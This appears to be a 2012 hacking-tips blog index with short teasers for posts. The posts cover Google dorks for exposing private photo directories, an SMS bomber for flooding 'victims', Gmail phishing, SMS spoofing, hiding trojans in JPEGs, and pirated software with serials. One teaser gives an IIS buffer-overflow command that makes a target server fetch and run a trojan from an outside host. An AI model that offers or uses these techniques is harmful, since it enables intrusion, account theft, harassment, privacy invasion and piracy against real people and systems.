Friday, June 29, 2012

Google trick to find private pictures!

Maybe you are a "voyeur". Maybe you need some pictures for your school work. Of course you can go to a dedicated website where you can find lot of free pictures. But you can also dig some private pictures directories. Try this little code in Google, you may find lot of Non public pictures   Quote: intitle:index.of +"Indexed by Apache::Gallery" search by adding a word at the end, for examp...

Hack about 80% of every website out there

All right, You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc. You want to learn to hack, stop asking stupid questions. There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have : It's called Acunetix. Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses,...

Beaver's SMS Bomber Pro

Features Include: Full Feature List: Custom SMTP Server (Make Sure You Type It Right) Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself) Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send) Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings) Fixed XP GUI Issues Stop Bombing At Any Time Watch The Number Of SMS Sent In The Title Bar No Longer Freezes While Sending Added A Recent slave's Box...

Use SSH Tunneling to surf net invisibly

Unable to surf net over work/college ? Want to surf net invisibly ? Well,we have a solution for that,SSH Tunneling.An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too.SSH Is pretty awesome. Without leaving your seat,you...

{Linux} Tips and Tricks

Are you a unix geek ? Here are both indispensible linux tips and tricks which are staleness for new and knowledgeable users alike.Lets change a aspect at them-More Linux Tips and tricks for geeks and newbies alike Hurrying up your alcoholic journeying Get faster file dealings by using 32-bit transfers on your cruel force Conscionable add the line:     hdparm -c3 /dev/hdX to a bootup script.If you use SuSE or remaining distros based on SYS ...

Learn How To Hack Web Servers

Hacking Tool: IISHack.exe iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.   c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.   "IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with...

Speed Up Windows

Safely turn Off Windows Services To speed up Windows Some of the windows services starts with the windows eating up the memory. and if they are not used by you then you can stop them from starting with windows. You can re-enable them when you need it. To check the services program...goto start -> run ->type" services.msc " (without quotes) -> and hit enter. There will be a list of services...Some common services you can check and stop them according to your need...

Hack Gmail Accounts

Today i will explain you How to hack Gmail account step by step. In my previous article i have explained you the basic technique involved in hacking Gmail account or password but not explained that in extended way but today i will disclose you how the hackers really hack the gmail account or gmail password using fake pages or simply called Phish pages and the technique involved is called Phising. NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY. DON'T...

RAR Password Recovery Magic 6.1.1.378 Full

  RAR Password Recovery Magic is a powerful tool designed to recover lost or forgotten passwords for a RAR/WinRAR archives. RAR Password Recovery Magic supports the customizable brute-force and dictionary-based attacks.RAR Password Recovery Magic has an easy to use interface. RAR Password Recovery Magic 6.1.1.378.Incl.Serial Download : | FileSonic | DepositFiles | Turbobit...

Send Sms From Friends MobileTo Any Number

Hello Friends, today i am sharing an awesome trick with you all. Today i will tell you how to send anonymous SMS i.e. How to send SMS from any mobile number to any mobile number that means how to send SMS from your friend's mobile to your mobile or your friends mobile to your friends mobile or any other number. Basically this technique is call SMS spoofing. By SMS spoofing we can send SMS to any mobile using anyone's mobile number. How this trick can be helpful?? its simple it is helpful when you wanna prank your friends, enemies...

Hiren's Bootcd 12.0 + Keyboard Patch

Hiren's BootCD is a live CD containing various diagnostic programs such as partitioning agents, system performance benchmarks, disk cloning and imaging tools, data recovery tools, MBR tools, BIOS tools, and many others for fixing various computer problems.[2] As it is a bootable CD, it can be useful even if the primary operating system cannot be booted. Hiren's Boot CD has an extensive list of software. Utilities with similar functionality...

USB Disk Security v5.4.0.12 Final

USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. USB Disk Security is the best antivirus software to permanently protect offline computer without the need for signature updates, but other antivirus software should update signature database regularly, and they cannot effectively protect offline computer. This...

Reset Windows Password Advanced Edition v1.2.1.195 Retail

Lost password or locked Windows account is the most frequent problem data recovery specialists have to deal with. You could format the hard drive or reinstall your operating system, but that wouldn't keep you from partial loss of data, personal settings and extra headache. Besides, all that can take some time. There is a quicker and more elegant way out of this situation. Just run Reset Windows Passwords from a bootable CD or ...

Registry Purify 5.14 Final

Registry Purify analyze and clean invalid entries in Windows registry, backup and restore entire registry in system file level, compact registry to gain efficiency. Main Features: ? New Scan Engine Registry Purify improves analyzing speed over 50% than normal algorithm by using new "SharpANA Engine". Meanwhile, "SharpANA Engine" reduces reading of hard disk evidently, which protects your hard disk effectively. The proper use of...

Protect Folder 3.2.1.0 Final

  Protect Folder 3.2.1.0 Full Version Encrypt your files and data on-the-fly with a secure password. Protect Folder provides on-the-fly protection of your files, folders and removable drives. No need to run anything to access encrypted folders. Just double-click on a protected folder and enter your password, and you can access your protected data completely transparently - exactly as you would access any other file or folde...

How to run JPG as an EXE

I have searched on this forum and have not found this method anywhere so I decided to post it. Note I have used this method for years and it works on every Windows OS. Requirements: Windows Your EXE. Step 1 : First things make a New Folder...

How to Enable Right Click in Websites

How to Enable Right Click in Websites You are probably sometimes tried to save images or copy the contents of the website that forbid their use of the right-click. Most websites use javascript to prohibit the use of the right-click , so to enable it you should disable the javascript. There are many ways to do ti , the simplest by my opinion is using Web Developer 1.1.9 , firefox add-on . 1) Downlaod Web Developer 1.1.9 Download it from...

How To Hack Websites And WebServers

Before you hack a system, you must decide what your goal is. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discovering vulnerabilities & see how you can exploit them, etc ... ? The point is that you have to decide what the goal is first. Download Tutorial How to Hack Webservers The most common goals are: 1. breaking into the system & taking the admin privileges. 2. gaining sensitive data, such as...

Tuesday, June 5, 2012

Manually Hide any file in JPEG

Hello Friends, today i will explain you how to hide any file behind the JPEG image manually that is without any software. Its a very easy trick and also very useful if you want to send information secretly to your friend. Also its different from stenography as it does hides text behind images or text behind mp3 files. Its universal, you can hide any file, virus or Trojan or anything behind image using this trick.  Things that you will need for this trick: 1. Winrar installed on your system. 2. Little knowledge of command...